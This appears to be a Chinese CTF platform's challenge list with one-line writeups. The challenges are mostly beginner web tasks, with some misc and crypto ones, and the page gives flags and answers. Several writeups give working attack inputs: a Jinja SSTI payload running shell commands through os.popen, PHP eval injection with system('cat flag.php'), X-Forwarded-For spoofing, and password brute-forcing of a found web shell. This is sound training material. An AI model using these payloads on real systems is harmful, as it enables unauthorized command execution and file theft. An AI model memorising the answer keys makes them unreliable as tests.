为你找到 340 个题目。
68. [平台] 滑稽
分数: 10 金币: 1 已通过
通过: 29131 标签:
平台
WEB
writeup:
查看源码,搜索flag
69. [平台] 计算器
分数: 10 金币: 1 已通过
通过: 28941 标签:
平台
WEB
writeup:
修改input maxlength
70. [平台] GET
分数: 10 金币: 1 已通过
通过: 28045 标签:
平台
WEB
writeup:
/?what=flag
71. [平台] POST
分数: 10 金币: 1 已通过
通过: 23609 标签:
平台
WEB
writeup:
curl -d what=flag http://ip:port/
72. [平台] 矛盾
分数: 10 金币: 1 已通过
通过: 21507 标签:
平台
WEB
writeup:
/?num=1a
74. [平台] 你必须让他停下
分数: 10 金币: 1 已通过
通过: 20838 标签:
平台
WEB
writeup:
不停curl,知道出现10.jpg,flag就显示了
73. [平台] alert
分数: 10 金币: 1 已通过
通过: 19851 标签:
平台
WEB
writeup:
查看源码,复制那一串unicode字符串,用站长工具-unicode编码转换解码
2. [平台] 这是一张单纯的图片
分数: 10 金币: 1 已通过
通过: 18394 标签:
平台
MISC
writeup:
strings file.jpg 提取最后一行unicode字符串,解码
203. [平台] Simple_SSTI_2
分数: 10 金币: 3 已通过
通过: 14983 标签:
平台
WEB
writeup:
SSTI模版注入: /?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},
再 /?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
78. [平台] 网站被黑
分数: 15 金币: 2 已通过
通过: 14950 标签:
平台
WEB
writeup:
dirsearch 扫出来shell.php,再密码爆破,得到hack
77. [平台] 头等舱
分数: 15 金币: 1 已通过
通过: 14897 标签:
平台
WEB
writeup:
curl -I http://114.67.175.224:10352/
75. [平台] eval
分数: 15 金币: 1 已通过
通过: 14120 标签:
平台
WEB
writeup:
解法一:/?hello=file('flag.php') 解法二:/?hello=system('cat flag.php') 解法三:/?hello=show_source('flag.php')
47. [平台] 聪明的小羊
分数: 10 金币: 1 已通过
通过: 13912 标签:
平台
Crypto
writeup:
栅栏编码,栏位为2,解码后 flag{6fde4163df05d900}
3. [平台] 隐写
分数: 10 金币: 1 已通过
通过: 13131 标签:
平台
MISC
writeup:
hex friend 打开图片,修改高度,A4=>F4,可打开;或者程序检测crc,恢复高度
46. [平台] /.-
分数: 10 金币: 1 已通过
通过: 12750 标签:
平台
Crypto
writeup:
摩斯电码先解密,得到FLAG%u7bD3FCBF17F9399504%u7d,%u替换成%,url解码,再转为小写,得到flag
79. [平台] 本地管理员
分数: 15 金币: 2 已通过
通过: 12497 标签:
平台
WEB
writeup:
页面源码,dGVzdDEyMw==,base64解码得到test123,hackbar提交,新增header,X-Forwarded-For: 127.0.0.1 ,payload pass=test123&user=admin
76. [平台] 变量1
分数: 15 金币: 1 已通过
通过: 12355 标签:
平台
WEB
writeup:
解法一:/?args=GLOBALS